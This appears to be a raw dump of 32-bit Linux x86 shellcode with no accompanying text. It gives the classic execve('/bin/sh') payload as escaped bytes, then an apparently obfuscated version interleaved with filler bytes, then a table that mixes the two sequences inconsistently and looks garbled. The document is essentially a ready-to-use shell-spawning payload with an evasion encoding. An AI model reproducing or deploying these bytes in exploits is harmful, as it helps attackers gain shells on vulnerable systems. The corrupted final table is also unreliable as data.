\x31\xf6\xeb\x1c\x5e\x31\xdb\xf7
\xe3\x88\x5e\x07\x89\x76\x08\x89
\x5e\x0c\x8d\x1e\x8d\x4e\x08\x8d
\x56\x0c\x31\xc0\xb0\x0b\xcd\x80
\xe8\xdf\xff\xff\xff\x2f\x62\x69
\x6e\x2f\x73\x68\x41\x42\x42\x42
\x42\x43\x43\x43\x43

;0x31,0x0e,0xf6,0xc3,0xeb,0xe7,0x1c,0x0e,
;0x5e,0xa4,0x31,0xc7,0xdb,0x17,0xf7,0x7f,
;0xe3,0x5d,0x88,0xed,0x5e,0x5c,0x07,0x34,
;0x89,0x20,0x76,0xb8,0x08,0x23,0x89,0x0e,
;0x5e,0xb6,0x0c,0x3a,0x8d,0xb9,0x1e,0xb4,
;0x8d,0x2f,0x4e,0xf1,0x08,0x26,0x8d,0xf7,
;0x56,0x79,0x0c,0xc0,0x31,0x5c,0xc0,0xf4,
;0xb0,0x69,0x0b,0xfd,0xcd,0xad,0x80,0x32,
;0xe8,0xcb,0xdf,0x60,0xff,0x24,0xff,0x53,
;0xff,0xb4,0x2f,0x64,0x62,0xc0,0x69,0xa3,
;0x6e,0x04,0x2f,0x20,0x73,0xa2,0x68,0x05,
;0x41,0x70,0x42,0x26,0x42,0x0c,0x42,0xdb,
;0x42,0x26,0x43,0xd3,0x43,0xd9,0x43,0x85,
;0x43,0xcd,0x02,0x02

0x31	0xf6	0xeb	0x1c	0x5e	0x31	0xdb	0xf7
0xe3	0x88	0x5e	0x07	0x89	0x76	0x08	0x7f
0xe3	0x5d	0x88	0xed	0x5e	0x5c	0x07	0x34
0x89	0x20	0x76	0xb8	0x08	0x23	0x89	0x0e
0x5e	0xb6	0x0c	0x3a	0x8d	0xb9	0x1e	0xb4
0x8d	0x2f	0x4e	0xf1	0x08	0x26	0x8d	0xf7
0x56	0x79	0x0c	0xc0	0x31	0x5c	0xc0	0xf4
0xb0	0x69	0x0b	0xfd	0xcd	0xad	0x80	0x32
0xe8	0xcb	0xdf	0x60	0xff	0x24	0xff	0x53
0xff	0xb4	0x2f	0x64	0x62	0xc0	0xa3	0x6e
0x04	0x2f	0x20	0x73	0xa2	0x68	0x05	0x41
0x70	0x42	0x26	0x42	0x0c	0x42	0xdb	0x42
0x26	0x43	0xd3	0x43	0xd9	0x43	0x85	0x43

